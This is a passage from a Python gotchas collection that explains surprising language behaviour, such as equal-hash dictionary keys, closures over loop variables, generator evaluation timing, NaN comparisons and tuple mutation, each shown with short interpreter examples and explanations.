[issue](https://github.com/satwikkansal/wtfpython/issues/100) for updates. --- ### ▶ Hash brownies <!-- Example ID: eb17db53-49fd-4b61-85d6-345c5ca213ff ---> 1\. ```py some_dict = {} some_dict[5.5] = "JavaScript" some_dict[5.0] = "Ruby" some_dict[5] = "Python" ``` **Output:** ```py >>> some_dict[5.5] "JavaScript" >>> some_dict[5.0] # "Python" destroyed the existence of "Ruby"? "Python" >>> some_dict[5] "Python" >>> complex_five = 5 + 0j >>> type(complex_five) complex >>> some_dict[complex_five] "Python" ``` So, why is Python all over the place? #### 💡 Explanation * Uniqueness of keys in a Python dictionary is by *equivalence*, not identity. So even though `5`, `5.0`, and `5 + 0j` are distinct objects of different types, since they're equal, they can't both be in the same `dict` (or `set`). As soon as you insert any one of them, attempting to look up any distinct but equivalent key will succeed with the original mapped value (rather than failing with a `KeyError`): ```py >>> 5 == 5.0 == 5 + 0j True >>> 5 is not 5.0 is not 5 + 0j True >>> some_dict = {} >>> some_dict[5.0] = "Ruby" >>> 5.0 in some_dict True >>> (5 in some_dict) and (5 + 0j in some_dict) True ``` * This applies when setting an item as well. So when you do `some_dict[5] = "Python"`, Python finds the existing item with equivalent key `5.0 -> "Ruby"`, overwrites its value in place, and leaves the original key alone. ```py >>> some_dict {5.0: 'Ruby'} >>> some_dict[5] = "Python" >>> some_dict {5.0: 'Python'} ``` * So how can we update the key to `5` (instead of `5.0`)? We can't actually do this update in place, but what we can do is first delete the key (`del some_dict[5.0]`), and then set it (`some_dict[5]`) to get the integer `5` as the key instead of floating `5.0`, though this should be needed in rare cases. * How did Python find `5` in a dictionary containing `5.0`? Python does this in constant time without having to scan through every item by using hash functions. When Python looks up a key `foo` in a dict, it first computes `hash(foo)` (which runs in constant-time). Since in Python it is required that objects that compare equal also have the same hash value ([docs](https://docs.python.org/3/reference/datamodel.html#object.__hash__) here), `5`, `5.0`, and `5 + 0j` have the same hash value. ```py >>> 5 == 5.0 == 5 + 0j True >>> hash(5) == hash(5.0) == hash(5 + 0j) True ``` **Note:** The inverse is not necessarily true: Objects with equal hash values may themselves be unequal. (This causes what's known as a [hash collision](https://en.wikipedia.org/wiki/Collision_(computer_science)), and degrades the constant-time performance that hashing usually provides.) --- ### ▶ Deep down, we're all the same. <!-- Example ID: 8f99a35f-1736-43e2-920d-3b78ec35da9b ---> ```py class WTF: pass ``` **Output:** ```py >>> WTF() == WTF() # two different instances can't be equal False >>> WTF() is WTF() # identities are also different False >>> hash(WTF()) == hash(WTF()) # hashes _should_ be different as well True >>> id(WTF()) == id(WTF()) True ``` #### 💡 Explanation: * When `id` was called, Python created a `WTF` class object and passed it to the `id` function. The `id` function takes its `id` (its memory location), and throws away the object. The object is destroyed. * When we do this twice in succession, Python allocates the same memory location to this second object as well. Since (in CPython) `id` uses the memory location as the object id, the id of the two objects is the same. * So, the object's id is unique only for the lifetime of the object. After the object is destroyed, or before it is created, something else can have the same id. * But why did the `is` operator evaluate to `False`? Let's see with this snippet. ```py class WTF(object): def __init__(self): print("I") def __del__(self): print("D") ``` **Output:** ```py >>> WTF() is WTF() I I D D False >>> id(WTF()) == id(WTF()) I D I D True ``` As you may observe, the order in which the objects are destroyed is what made all the difference here. --- ### ▶ Disorder within order * <!-- Example ID: 91bff1f8-541d-455a-9de4-6cd8ff00ea66 ---> ```py from collections import OrderedDict dictionary = dict() dictionary[1] = 'a'; dictionary[2] = 'b'; ordered_dict = OrderedDict() ordered_dict[1] = 'a'; ordered_dict[2] = 'b'; another_ordered_dict = OrderedDict() another_ordered_dict[2] = 'b'; another_ordered_dict[1] = 'a'; class DictWithHash(dict): """ A dict that also implements __hash__ magic. """ __hash__ = lambda self: 0 class OrderedDictWithHash(OrderedDict): """ An OrderedDict that also implements __hash__ magic. """ __hash__ = lambda self: 0 ``` **Output** ```py >>> dictionary == ordered_dict # If a == b True >>> dictionary == another_ordered_dict # and b == c True >>> ordered_dict == another_ordered_dict # then why isn't c == a ?? False # We all know that a set consists of only unique elements, # let's try making a set of these dictionaries and see what happens... >>> len({dictionary, ordered_dict, another_ordered_dict}) Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: unhashable type: 'dict' # Makes sense since dict don't have __hash__ implemented, let's use # our wrapper classes. >>> dictionary = DictWithHash() >>> dictionary[1] = 'a'; dictionary[2] = 'b'; >>> ordered_dict = OrderedDictWithHash() >>> ordered_dict[1] = 'a'; ordered_dict[2] = 'b'; >>> another_ordered_dict = OrderedDictWithHash() >>> another_ordered_dict[2] = 'b'; another_ordered_dict[1] = 'a'; >>> len({dictionary, ordered_dict, another_ordered_dict}) 1 >>> len({ordered_dict, another_ordered_dict, dictionary}) # changing the order 2 ``` What is going on here? #### 💡 Explanation: - The reason why intransitive equality didn't hold among `dictionary`, `ordered_dict` and `another_ordered_dict` is because of the way `__eq__` method is implemented in `OrderedDict` class. From the [docs](https://docs.python.org/3/library/collections.html#ordereddict-objects) > Equality tests between OrderedDict objects are order-sensitive and are implemented as `list(od1.items())==list(od2.items())`. Equality tests between `OrderedDict` objects and other Mapping objects are order-insensitive like regular dictionaries. - The reason for this equality in behavior is that it allows `OrderedDict` objects to be directly substituted anywhere a regular dictionary is used. - Okay, so why did changing the order affect the length of the generated `set` object? The answer is the lack of intransitive equality only. Since sets are "unordered" collections of unique elements, the order in which elements are inserted shouldn't matter. But in this case, it does matter. Let's break it down a bit, ```py >>> some_set = set() >>> some_set.add(dictionary) # these are the mapping objects from the snippets above >>> ordered_dict in some_set True >>> some_set.add(ordered_dict) >>> len(some_set) 1 >>> another_ordered_dict in some_set True >>> some_set.add(another_ordered_dict) >>> len(some_set) 1 >>> another_set = set() >>> another_set.add(ordered_dict) >>> another_ordered_dict in another_set False >>> another_set.add(another_ordered_dict) >>> len(another_set) 2 >>> dictionary in another_set True >>> another_set.add(another_ordered_dict) >>> len(another_set) 2 ``` So the inconsistency is due to `another_ordered_dict in another_set` being `False` because `ordered_dict` was already present in `another_set` and as observed before, `ordered_dict == another_ordered_dict` is `False`. --- ### ▶ Keep trying... * <!-- Example ID: b4349443-e89f-4d25-a109-82616be9d41a ---> ```py def some_func(): try: return 'from_try' finally: return 'from_finally' def another_func(): for _ in range(3): try: continue finally: print("Finally!") def one_more_func(): # A gotcha! try: for i in range(3): try: 1 / i except ZeroDivisionError: # Let's throw it here and handle it outside for loop raise ZeroDivisionError("A trivial divide by zero error") finally: print("Iteration", i) break except ZeroDivisionError as e: print("Zero division error occurred", e) ``` **Output:** ```py >>> some_func() 'from_finally' >>> another_func() Finally! Finally! Finally! >>> 1 / 0 Traceback (most recent call last): File "<stdin>", line 1, in <module> ZeroDivisionError: division by zero >>> one_more_func() Iteration 0 ``` #### 💡 Explanation: - When a `return`, `break` or `continue` statement is executed in the `try` suite of a "try…finally" statement, the `finally` clause is also executed on the way out. - The return value of a function is determined by the last `return` statement executed. Since the `finally` clause always executes, a `return` statement executed in the `finally` clause will always be the last one executed. - The caveat here is, if the finally clause executes a `return` or `break` statement, the temporarily saved exception is discarded. --- ### ▶ For what? <!-- Example ID: 64a9dccf-5083-4bc9-98aa-8aeecde4f210 ---> ```py some_string = "wtf" some_dict = {} for i, some_dict[i] in enumerate(some_string): i = 10 ``` **Output:** ```py >>> some_dict # An indexed dict appears. {0: 'w', 1: 't', 2: 'f'} ``` #### 💡 Explanation: * A `for` statement is defined in the [Python grammar](https://docs.python.org/3/reference/grammar.html) as: ``` for_stmt: 'for' exprlist 'in' testlist ':' suite ['else' ':' suite] ``` Where `exprlist` is the assignment target. This means that the equivalent of `{exprlist} = {next_value}` is **executed for each item** in the iterable. An interesting example that illustrates this: ```py for i in range(4): print(i) i = 10 ``` **Output:** ``` 0 1 2 3 ``` Did you expect the loop to run just once? **💡 Explanation:** - The assignment statement `i = 10` never affects the iterations of the loop because of the way for loops work in Python. Before the beginning of every iteration, the next item provided by the iterator (`range(4)` in this case) is unpacked and assigned the target list variables (`i` in this case). * The `enumerate(some_string)` function yields a new value `i` (a counter going up) and a character from the `some_string` in each iteration. It then sets the (just assigned) `i` key of the dictionary `some_dict` to that character. The unrolling of the loop can be simplified as: ```py >>> i, some_dict[i] = (0, 'w') >>> i, some_dict[i] = (1, 't') >>> i, some_dict[i] = (2, 'f') >>> some_dict ``` --- ### ▶ Evaluation time discrepancy <!-- Example ID: 6aa11a4b-4cf1-467a-b43a-810731517e98 ---> 1\. ```py array = [1, 8, 15] # A typical generator expression gen = (x for x in array if array.count(x) > 0) array = [2, 8, 22] ``` **Output:** ```py >>> print(list(gen)) # Where did the other values go? [8] ``` 2\. ```py array_1 = [1,2,3,4] gen_1 = (x for x in array_1) array_1 = [1,2,3,4,5] array_2 = [1,2,3,4] gen_2 = (x for x in array_2) array_2[:] = [1,2,3,4,5] ``` **Output:** ```py >>> print(list(gen_1)) [1, 2, 3, 4] >>> print(list(gen_2)) [1, 2, 3, 4, 5] ``` 3\. ```py array_3 = [1, 2, 3] array_4 = [10, 20, 30] gen = (i + j for i in array_3 for j in array_4) array_3 = [4, 5, 6] array_4 = [400, 500, 600] ``` **Output:** ```py >>> print(list(gen)) [401, 501, 601, 402, 502, 602, 403, 503, 603] ``` #### 💡 Explanation - In a [generator](https://wiki.python.org/moin/Generators) expression, the `in` clause is evaluated at declaration time, but the conditional clause is evaluated at runtime. - So before runtime, `array` is re-assigned to the list `[2, 8, 22]`, and since out of `1`, `8` and `15`, only the count of `8` is greater than `0`, the generator only yields `8`. - The differences in the output of `g1` and `g2` in the second part is due the way variables `array_1` and `array_2` are re-assigned values. - In the first case, `array_1` is bound to the new object `[1,2,3,4,5]` and since the `in` clause is evaluated at the declaration time it still refers to the old object `[1,2,3,4]` (which is not destroyed). - In the second case, the slice assignment to `array_2` updates the same old object `[1,2,3,4]` to `[1,2,3,4,5]`. Hence both the `g2` and `array_2` still have reference to the same object (which has now been updated to `[1,2,3,4,5]`). - Okay, going by the logic discussed so far, shouldn't be the value of `list(gen)` in the third snippet be `[11, 21, 31, 12, 22, 32, 13, 23, 33]`? (because `array_3` and `array_4` are going to behave just like `array_1`). The reason why (only) `array_4` values got updated is explained in [PEP-289](https://www.python.org/dev/peps/pep-0289/#the-details) > Only the outermost for-expression is evaluated immediately, the other expressions are deferred until the generator is run. --- ### ▶ `is not ...` is not `is (not ...)` <!-- Example ID: b26fb1ed-0c7d-4b9c-8c6d-94a58a055c0d ---> ```py >>> 'something' is not None True >>> 'something' is (not None) False ``` #### 💡 Explanation - `is not` is a single binary operator, and has behavior different than using `is` and `not` separated. - `is not` evaluates to `False` if the variables on either side of the operator point to the same object and `True` otherwise. - In the example, `(not None)` evaluates to `True` since the value `None` is `False` in a boolean context, so the expression becomes `'something' is True`. --- ### ▶ A tic-tac-toe where X wins in the first attempt! <!-- Example ID: 69329249-bdcb-424f-bd09-cca2e6705a7a ---> ```py # Let's initialize a row row = [""] * 3 #row i['', '', ''] # Let's make a board board = [row] * 3 ``` **Output:** ```py >>> board [['', '', ''], ['', '', ''], ['', '', '']] >>> board[0] ['', '', ''] >>> board[0][0] '' >>> board[0][0] = "X" >>> board [['X', '', ''], ['X', '', ''], ['X', '', '']] ``` We didn't assign three `"X"`s, did we? #### 💡 Explanation: When we initialize `row` variable, this visualization explains what happens in the memory ![image](/images/tic-tac-toe/after_row_initialized.png) And when the `board` is initialized by multiplying the `row`, this is what happens inside the memory (each of the elements `board[0]`, `board[1]` and `board[2]` is a reference to the same list referred by `row`) ![image](/images/tic-tac-toe/after_board_initialized.png) We can avoid this scenario here by not using `row` variable to generate `board`. (Asked in [this](https://github.com/satwikkansal/wtfpython/issues/68) issue). ```py >>> board = [['']*3 for _ in range(3)] >>> board[0][0] = "X" >>> board [['X', '', ''], ['', '', ''], ['', '', '']] ``` --- ### ▶ Schrödinger's variable * <!-- Example ID: 4dc42f77-94cb-4eb5-a120-8203d3ed7604 ---> ```py funcs = [] results = [] for x in range(7): def some_func(): return x funcs.append(some_func) results.append(some_func()) # note the function call here funcs_results = [func() for func in funcs] ``` **Output (Python version):** ```py >>> results [0, 1, 2, 3, 4, 5, 6] >>> funcs_results [6, 6, 6, 6, 6, 6, 6] ``` The values of `x` were different in every iteration prior to appending `some_func` to `funcs`, but all the functions return 6 when they're evaluated after the loop completes. 2. ```py >>> powers_of_x = [lambda x: x**i for i in range(10)] >>> [f(2) for f in powers_of_x] [512, 512, 512, 512, 512, 512, 512, 512, 512, 512] ``` #### 💡 Explanation: * When defining a function inside a loop that uses the loop variable in its body, the loop function's closure is bound to the *variable*, not its *value*. The function looks up `x` in the surrounding context, rather than using the value of `x` at the time the function is created. So all of the functions use the latest value assigned to the variable for computation. We can see that it's using the `x` from the surrounding context (i.e. *not* a local variable) with: ```py >>> import inspect >>> inspect.getclosurevars(funcs[0]) ClosureVars(nonlocals={}, globals={'x': 6}, builtins={}, unbound=set()) ``` Since `x` is a global value, we can change the value that the `funcs` will lookup and return by updating `x`: ```py >>> x = 42 >>> [func() for func in funcs] [42, 42, 42, 42, 42, 42, 42] ``` * To get the desired behavior you can pass in the loop variable as a named variable to the function. **Why does this work?** Because this will define the variable *inside* the function's scope. It will no longer go to the surrounding (global) scope to look up the variables value but will create a local variable that stores the value of `x` at that point in time. ```py funcs = [] for x in range(7): def some_func(x=x): return x funcs.append(some_func) ``` **Output:** ```py >>> funcs_results = [func() for func in funcs] >>> funcs_results [0, 1, 2, 3, 4, 5, 6] ``` It is not longer using the `x` in the global scope: ```py >>> inspect.getclosurevars(funcs[0]) ClosureVars(nonlocals={}, globals={}, builtins={}, unbound=set()) ``` --- ### ▶ The chicken-egg problem * <!-- Example ID: 60730dc2-0d79-4416-8568-2a63323b3ce8 ---> 1\. ```py >>> isinstance(3, int) True >>> isinstance(type, object) True >>> isinstance(object, type) True ``` So which is the "ultimate" base class? There's more to the confusion by the way, 2\. ```py >>> class A: pass >>> isinstance(A, A) False >>> isinstance(type, type) True >>> isinstance(object, object) True ``` 3\. ```py >>> issubclass(int, object) True >>> issubclass(type, object) True >>> issubclass(object, type) False ``` #### 💡 Explanation - `type` is a [metaclass](https://realpython.com/python-metaclasses/) in Python. - **Everything** is an `object` in Python, which includes classes as well as their objects (instances). - class `type` is the metaclass of class `object`, and every class (including `type`) has inherited directly or indirectly from `object`. - There is no real base class among `object` and `type`. The confusion in the above snippets is arising because we're thinking about these relationships (`issubclass` and `isinstance`) in terms of Python classes. The relationship between `object` and `type` can't be reproduced in pure python. To be more precise the following relationships can't be reproduced in pure Python, + class A is an instance of class B, and class B is an instance of class A. + class A is an instance of itself. - These relationships between `object` and `type` (both being instances of each other as well as themselves) exist in Python because of "cheating" at the implementation level. --- ### ▶ Subclass relationships <!-- Example ID: 9f6d8cf0-e1b5-42d0-84a0-4cfab25a0bc0 ---> **Output:** ```py >>> from collections.abc import Hashable >>> issubclass(list, object) True >>> issubclass(object, Hashable) True >>> issubclass(list, Hashable) False ``` The Subclass relationships were expected to be transitive, right? (i.e., if `A` is a subclass of `B`, and `B` is a subclass of `C`, the `A` _should_ a subclass of `C`) #### 💡 Explanation: * Subclass relationships are not necessarily transitive in Python. Anyone is allowed to define their own, arbitrary `__subclasscheck__` in a metaclass. * When `issubclass(cls, Hashable)` is called, it simply looks for non-Falsey "`__hash__`" method in `cls` or anything it inherits from. * Since `object` is hashable, but `list` is non-hashable, it breaks the transitivity relation. * More detailed explanation can be found [here](https://www.naftaliharris.com/blog/python-subclass-intransitivity/). --- ### ▶ Methods equality and identity <!-- Example ID: 94802911-48fe-4242-defa-728ae893fa32 ---> 1. ```py class SomeClass: def method(self): pass @classmethod def classm(cls): pass @staticmethod def staticm(): pass ``` **Output:** ```py >>> print(SomeClass.method is SomeClass.method) True >>> print(SomeClass.classm is SomeClass.classm) False >>> print(SomeClass.classm == SomeClass.classm) True >>> print(SomeClass.staticm is SomeClass.staticm) True ``` Accessing `classm` twice, we get an equal object, but not the *same* one? Let's see what happens with instances of `SomeClass`: 2. ```py o1 = SomeClass() o2 = SomeClass() ``` **Output:** ```py >>> print(o1.method == o2.method) False >>> print(o1.method == o1.method) True >>> print(o1.method is o1.method) False >>> print(o1.classm is o1.classm) False >>> print(o1.classm == o1.classm == o2.classm == SomeClass.classm) True >>> print(o1.staticm is o1.staticm is o2.staticm is SomeClass.staticm) True ``` Accessing `classm` or `method` twice, creates equal but not *same* objects for the same instance of `SomeClass`. #### 💡 Explanation * Functions are [descriptors](https://docs.python.org/3/howto/descriptor.html). Whenever a function is accessed as an attribute, the descriptor is invoked, creating a method object which "binds" the function with the object owning the attribute. If called, the method calls the function, implicitly passing the bound object as the first argument (this is how we get `self` as the first argument, despite not passing it explicitly). ```py >>> o1.method <bound method SomeClass.method of <__main__.SomeClass object at ...>> ``` * Accessing the attribute multiple times creates a method object every time! Therefore `o1.method is o1.method` is never truthy. Accessing functions as class attributes (as opposed to instance) does not create methods, however; so `SomeClass.method is SomeClass.method` is truthy. ```py >>> SomeClass.method <function SomeClass.method at ...> ``` * `classmethod` transforms functions into class methods. Class methods are descriptors that, when accessed, create a method object which binds the *class* (type) of the object, instead of the object itself. ```py >>> o1.classm <bound method SomeClass.classm of <class '__main__.SomeClass'>> ``` * Unlike functions, `classmethod`s will create a method also when accessed as class attributes (in which case they bind the class, not to the type of it). So `SomeClass.classm is SomeClass.classm` is falsy. ```py >>> SomeClass.classm <bound method SomeClass.classm of <class '__main__.SomeClass'>> ``` * A method object compares equal when both the functions are equal, and the bound objects are the same. So `o1.method == o1.method` is truthy, although not the same object in memory. * `staticmethod` transforms functions into a "no-op" descriptor, which returns the function as-is. No method objects are ever created, so comparison with `is` is truthy. ```py >>> o1.staticm <function SomeClass.staticm at ...> >>> SomeClass.staticm <function SomeClass.staticm at ...> ``` * Having to create new "method" objects every time Python calls instance methods and having to modify the arguments every time in order to insert `self` affected performance badly. CPython 3.7 [solved it](https://bugs.python.org/issue26110) by introducing new opcodes that deal with calling methods without creating the temporary method objects. This is used only when the accessed function is actually called, so the snippets here are not affected, and still generate methods :) ### ▶ All-true-ation * <!-- Example ID: dfe6d845-e452-48fe-a2da-0ed3869a8042 --> ```py >>> all([True, True, True]) True >>> all([True, True, False]) False >>> all([]) True >>> all([[]]) False >>> all([[[]]]) True ``` Why's this True-False alteration? #### 💡 Explanation: - The implementation of `all` function is equivalent to - ```py def all(iterable): for element in iterable: if not element: return False return True ``` - `all([])` returns `True` since the iterable is empty. - `all([[]])` returns `False` because the passed array has one element, `[]`, and in python, an empty list is falsy. - `all([[[]]])` and higher recursive variants are always `True`. This is because the passed array's single element (`[[...]]`) is no longer empty, and lists with values are truthy. --- ### ▶ The surprising comma <!-- Example ID: 31a819c8-ed73-4dcc-84eb-91bedbb51e58 ---> **Output (< 3.6):** ```py >>> def f(x, y,): ... print(x, y) ... >>> def g(x=4, y=5,): ... print(x, y) ... >>> def h(x, **kwargs,): File "<stdin>", line 1 def h(x, **kwargs,): ^ SyntaxError: invalid syntax >>> def h(*args,): File "<stdin>", line 1 def h(*args,): ^ SyntaxError: invalid syntax ``` #### 💡 Explanation: - Trailing comma is not always legal in formal parameters list of a Python function. - In Python, the argument list is defined partially with leading commas and partially with trailing commas. This conflict causes situations where a comma is trapped in the middle, and no rule accepts it. - **Note:** The trailing comma problem is [fixed in Python 3.6](https://bugs.python.org/issue9232). The remarks in [this](https://bugs.python.org/issue9232#msg248399) post discuss in brief different usages of trailing commas in Python. --- ### ▶ Strings and the backslashes <!-- Example ID: 6ae622c3-6d99-4041-9b33-507bd1a4407b ---> **Output:** ```py >>> print("\"") " >>> print(r"\"") \" >>> print(r"\") File "<stdin>", line 1 print(r"\") ^ SyntaxError: EOL while scanning string literal >>> r'\'' == "\\'" True ``` #### 💡 Explanation - In a usual python string, the backslash is used to escape characters that may have a special meaning (like single-quote, double-quote, and the backslash itself). ```py >>> "wt\"f" 'wt"f' ``` - In a raw string literal (as indicated by the prefix `r`), the backslashes pass themselves as is along with the behavior of escaping the following character. ```py >>> r'wt\"f' == 'wt\\"f' True >>> print(repr(r'wt\"f') 'wt\\"f' >>> print("\n") >>> print(r"\\n") '\\n' ``` - This means when a parser encounters a backslash in a raw string, it expects another character following it. And in our case (`print(r"\")`), the backslash escaped the trailing quote, leaving the parser without a terminating quote (hence the `SyntaxError`). That's why backslashes don't work at the end of a raw string. --- ### ▶ not knot! <!-- Example ID: 7034deb1-7443-417d-94ee-29a800524de8 ---> ```py x = True y = False ``` **Output:** ```py >>> not x == y True >>> x == not y File "<input>", line 1 x == not y ^ SyntaxError: invalid syntax ``` #### 💡 Explanation: * Operator precedence affects how an expression is evaluated, and `==` operator has higher precedence than `not` operator in Python. * So `not x == y` is equivalent to `not (x == y)` which is equivalent to `not (True == False)` finally evaluating to `True`. * But `x == not y` raises a `SyntaxError` because it can be thought of being equivalent to `(x == not) y` and not `x == (not y)` which you might have expected at first sight. * The parser expected the `not` token to be a part of the `not in` operator (because both `==` and `not in` operators have the same precedence), but after not being able to find an `in` token following the `not` token, it raises a `SyntaxError`. --- ### ▶ Half triple-quoted strings <!-- Example ID: c55da3e2-1034-43b9-abeb-a7a970a2ad9e ---> **Output:** ```py >>> print('wtfpython''') wtfpython >>> print("wtfpython""") wtfpython >>> # The following statements raise `SyntaxError` >>> # print('''wtfpython') >>> # print("""wtfpython") File "<input>", line 3 print("""wtfpython") ^ SyntaxError: EOF while scanning triple-quoted string literal ``` #### 💡 Explanation: + Python supports implicit [string literal concatenation](https://docs.python.org/3/reference/lexical_analysis.html#string-literal-concatenation), Example, ``` >>> print("wtf" "python") wtfpython >>> print("wtf" "") # or "wtf""" wtf ``` + `'''` and `"""` are also string delimiters in Python which causes a SyntaxError because the Python interpreter was expecting a terminating triple quote as delimiter while scanning the currently encountered triple quoted string literal. --- ### ▶ What's wrong with booleans? <!-- Example ID: 0bba5fa7-9e6d-4cd2-8b94-952d061af5dd ---> 1\. ```py # A simple example to count the number of booleans and # integers in an iterable of mixed data types. mixed_list = [False, 1.0, "some_string", 3, True, [], False] integers_found_so_far = 0 booleans_found_so_far = 0 for item in mixed_list: if isinstance(item, int): integers_found_so_far += 1 elif isinstance(item, bool): booleans_found_so_far += 1 ``` **Output:** ```py >>> integers_found_so_far 4 >>> booleans_found_so_far 0 ``` 2\. ```py >>> some_bool = True >>> "wtf" * some_bool 'wtf' >>> some_bool = False >>> "wtf" * some_bool '' ``` 3\. ```py def tell_truth(): True = False if True == False: print("I have lost faith in truth!") ``` **Output (< 3.x):** ```py >>> tell_truth() I have lost faith in truth! ``` #### 💡 Explanation: * `bool` is a subclass of `int` in Python ```py >>> issubclass(bool, int) True >>> issubclass(int, bool) False ``` * And thus, `True` and `False` are instances of `int` ```py >>> isinstance(True, int) True >>> isinstance(False, int) True ``` * The integer value of `True` is `1` and that of `False` is `0`. ```py >>> int(True) 1 >>> int(False) 0 ``` * See this StackOverflow [answer](https://stackoverflow.com/a/8169049/4354153) for the rationale behind it. * Initially, Python used to have no `bool` type (people used 0 for false and non-zero value like 1 for true). `True`, `False`, and a `bool` type was added in 2.x versions, but, for backward compatibility, `True` and `False` couldn't be made constants. They just were built-in variables, and it was possible to reassign them * Python 3 was backward-incompatible, the issue was finally fixed, and thus the last snippet won't work with Python 3.x! --- ### ▶ Class attributes and instance attributes <!-- Example ID: 6f332208-33bd-482d-8106-42863b739ed9 ---> 1\. ```py class A: x = 1 class B(A): pass class C(A): pass ``` **Output:** ```py >>> A.x, B.x, C.x (1, 1, 1) >>> B.x = 2 >>> A.x, B.x, C.x (1, 2, 1) >>> A.x = 3 >>> A.x, B.x, C.x # C.x changed, but B.x didn't (3, 2, 3) >>> a = A() >>> a.x, A.x (3, 3) >>> a.x += 1 >>> a.x, A.x (4, 3) ``` 2\. ```py class SomeClass: some_var = 15 some_list = [5] another_list = [5] def __init__(self, x): self.some_var = x + 1 self.some_list = self.some_list + [x] self.another_list += [x] ``` **Output:** ```py >>> some_obj = SomeClass(420) >>> some_obj.some_list [5, 420] >>> some_obj.another_list [5, 420] >>> another_obj = SomeClass(111) >>> another_obj.some_list [5, 111] >>> another_obj.another_list [5, 420, 111] >>> another_obj.another_list is SomeClass.another_list True >>> another_obj.another_list is some_obj.another_list True ``` #### 💡 Explanation: * Class variables and variables in class instances are internally handled as dictionaries of a class object. If a variable name is not found in the dictionary of the current class, the parent classes are searched for it. * The `+=` operator modifies the mutable object in-place without creating a new object. So changing the attribute of one instance affects the other instances and the class attribute as well. --- ### ▶ yielding None <!-- Example ID: 5a40c241-2c30-40d0-8ba9-cf7e097b3b53 ---> ```py some_iterable = ('a', 'b') def some_func(val): return "something" ``` **Output (<= 3.7.x):** ```py >>> [x for x in some_iterable] ['a', 'b'] >>> [(yield x) for x in some_iterable] <generator object <listcomp> at 0x7f70b0a4ad58> >>> list([(yield x) for x in some_iterable]) ['a', 'b'] >>> list((yield x) for x in some_iterable) ['a', None, 'b', None] >>> list(some_func((yield x)) for x in some_iterable) ['a', 'something', 'b', 'something'] ``` #### 💡 Explanation: - This is a bug in CPython's handling of `yield` in generators and comprehensions. - Source and explanation can be found here: https://stackoverflow.com/questions/32139885/yield-in-list-comprehensions-and-generator-expressions - Related bug report: https://bugs.python.org/issue10544 - Python 3.8+ no longer allows `yield` inside list comprehension and will throw a `SyntaxError`. --- ### ▶ Yielding from... return! * <!-- Example ID: 5626d8ef-8802-49c2-adbc-7cda5c550816 ---> 1\. ```py def some_func(x): if x == 3: return ["wtf"] else: yield from range(x) ``` **Output (> 3.3):** ```py >>> list(some_func(3)) [] ``` Where did the `"wtf"` go? Is it due to some special effect of `yield from`? Let's validate that, 2\. ```py def some_func(x): if x == 3: return ["wtf"] else: for i in range(x): yield i ``` **Output:** ```py >>> list(some_func(3)) [] ``` The same result, this didn't work either. #### 💡 Explanation: + From Python 3.3 onwards, it became possible to use `return` statement with values inside generators (See [PEP380](https://www.python.org/dev/peps/pep-0380/)). The [official docs](https://www.python.org/dev/peps/pep-0380/#enhancements-to-stopiteration) say that, > "... `return expr` in a generator causes `StopIteration(expr)` to be raised upon exit from the generator." + In the case of `some_func(3)`, `StopIteration` is raised at the beginning because of `return` statement. The `StopIteration` exception is automatically caught inside the `list(...)` wrapper and the `for` loop. Therefore, the above two snippets result in an empty list. + To get `["wtf"]` from the generator `some_func` we need to catch the `StopIteration` exception, ```py try: next(some_func(3)) except StopIteration as e: some_string = e.value ``` ```py >>> some_string ["wtf"] ``` --- ### ▶ Nan-reflexivity * <!-- Example ID: 59bee91a-36e0-47a4-8c7d-aa89bf1d3976 ---> 1\. ```py a = float('inf') b = float('nan') c = float('-iNf') # These strings are case-insensitive d = float('nan') ``` **Output:** ```py >>> a inf >>> b nan >>> c -inf >>> float('some_other_string') ValueError: could not convert string to float: some_other_string >>> a == -c # inf==inf True >>> None == None # None == None True >>> b == d # but nan!=nan False >>> 50 / a 0.0 >>> a / a nan >>> 23 + b nan ``` 2\. ```py >>> x = float('nan') >>> y = x / x >>> y is y # identity holds True >>> y == y # equality fails of y False >>> [y] == [y] # but the equality succeeds for the list containing y True ``` #### 💡 Explanation: - `'inf'` and `'nan'` are special strings (case-insensitive), which, when explicitly typecast-ed to `float` type, are used to represent mathematical "infinity" and "not a number" respectively. - Since according to IEEE standards ` NaN != NaN`, obeying this rule breaks the reflexivity assumption of a collection element in Python i.e. if `x` is a part of a collection like `list`, the implementations like comparison are based on the assumption that `x == x`. Because of this assumption, the identity is compared first (since it's faster) while comparing two elements, and the values are compared only when the identities mismatch. The following snippet will make things clearer, ```py >>> x = float('nan') >>> x == x, [x] == [x] (False, True) >>> y = float('nan') >>> y == y, [y] == [y] (False, True) >>> x == y, [x] == [y] (False, False) ``` Since the identities of `x` and `y` are different, the values are considered, which are also different; hence the comparison returns `False` this time. - Interesting read: [Reflexivity, and other pillars of civilization](https://bertrandmeyer.com/2010/02/06/reflexivity-and-other-pillars-of-civilization/) --- ### ▶ Mutating the immutable! <!-- Example ID: 15a9e782-1695-43ea-817a-a9208f6bb33d ---> This might seem trivial if you know how references work in Python. ```py some_tuple = ("A", "tuple", "with", "values") another_tuple = ([1, 2], [3, 4], [5, 6]) ``` **Output:** ```py >>> some_tuple[2] = "change this" TypeError: 'tuple' object does not support item assignment >>> another_tuple[2].append(1000) #This throws no error >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000]) >>> another_tuple[2] += [99, 999] TypeError: 'tuple' object does not support item assignment >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000, 99, 999]) ``` But I thought tuples were immutable... #### 💡 Explanation: * Quoting from https://docs.python.org/3/reference/datamodel.html > Immutable sequences An object of an immutable sequence type cannot change once it is created. (If the object contains references to other objects, these other objects may be mutable and may be modified; however, the collection of objects directly referenced by an immutable object cannot change.) * `+=` operator changes the list in-place. The item assignment doesn't work, but when the exception occurs, the item has already been changed in place. * There's also an explanation in [official Python FAQ](https://docs.python.org/3/faq/programming.html#why-does-a-tuple-i-item-raise-an-exception-when-the-addition-works). --- ### ▶ The disappearing variable from outer scope <!-- Example ID: 7f1e71b6-cb3e-44fb-aa47-87ef1b7decc8 ---> ```py e = 7 try: raise Exception() except Exception as e: pass ``` **Output (Python 2.x):** ```py >>> print(e) # prints nothing ``` **Output (Python 3.x):** ```py >>> print(e) NameError: name 'e' is not defined ``` #### 💡 Explanation: * Source: https://docs.python.org/3/reference/compound_stmts.html#except When an exception has been assigned using `as` target, it is cleared at the end of the `except` clause. This is as if ```py except E as N: foo ``` was translated into ```py except E as N: try: foo finally: del N ``` This means the exception must be assigned to a different name to be able to refer to it after the except clause. Exceptions are cleared because, with the traceback attached to them, they form a reference cycle with the stack frame, keeping all locals in that frame alive until the next garbage collection occurs. * The clauses are not scoped in Python. Everything in the example is present in the same scope, and the variable `e` got removed due to the execution of the `except` clause. The same is not the case 